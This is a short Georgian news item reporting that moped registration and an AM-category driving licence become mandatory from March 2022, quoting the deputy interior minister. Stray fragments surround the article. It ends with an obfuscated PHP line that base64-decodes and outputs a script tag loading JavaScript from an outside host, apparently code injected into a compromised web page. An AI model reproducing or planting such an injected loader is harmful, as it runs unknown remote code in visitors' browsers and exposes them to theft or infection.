celsiusi
ავერსი შნაიდერი
მოპედების რეგისტრაცია სავალდებულო 2022 წლის მარტიდან გახდება, მანამდე ნებაყოფლობითი იქნება.
 
ამასთან, როგორც შს მინისტრის მოადგილემ ალექსანდრე დარახველიძემ პარლამენტის რიგგარეშე სხდომაზე განმარტა, ეს პროცესი გულიხმობს იმას, რომ უნდა მოხდეს მოპედების დათვალიერება, მათზე შესაბამისი პასპორტისა და ნომრის გაცემა, როგორც ეს ავტოსატრანსპორტო საშუალებებზე ხდება.
 
“დღეს მოპედის რეგისტრაცია არ ხდება, არ გააჩნია არც ნომერი. ნებისმიერ ადამიანს ველოსიპედის მსგავსად შეუძლია მოპედი მაღაზიაში შეიძინოს და მართოს. წარმოდგენილი ცვლილებებით, ადამიანს, ვისაც სურს, რომ მოპედი მართოს, მართვის მოწმობის აღება მოუწევს - ეს AM კატეგირიის ახალი მოწმება იქნება, თუმცა თუკი აქვს ნებისმიერი სხვა კატეგორიის მართვის მოწმნობა, მიენიჭება უფლება, მოპედი მართოს“, - განმარტა ალექსანდრე დარახველიძემ.
 
ორწლიანი პაუზის შემდეგ, პარლამენტი “საგზაო მოძრაობის შესახებ“ კანონში დაგეგმილ ცვლილებებს დაუბრუნდა. ჯერ კიდევ 2019 წლის მაისში ინიცირებული საკანონმდებლო ცვლილებები შს სამინისტრომ პლენარულ სხდომაზე პირველი მოსმენით წარადგინა.
1014
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");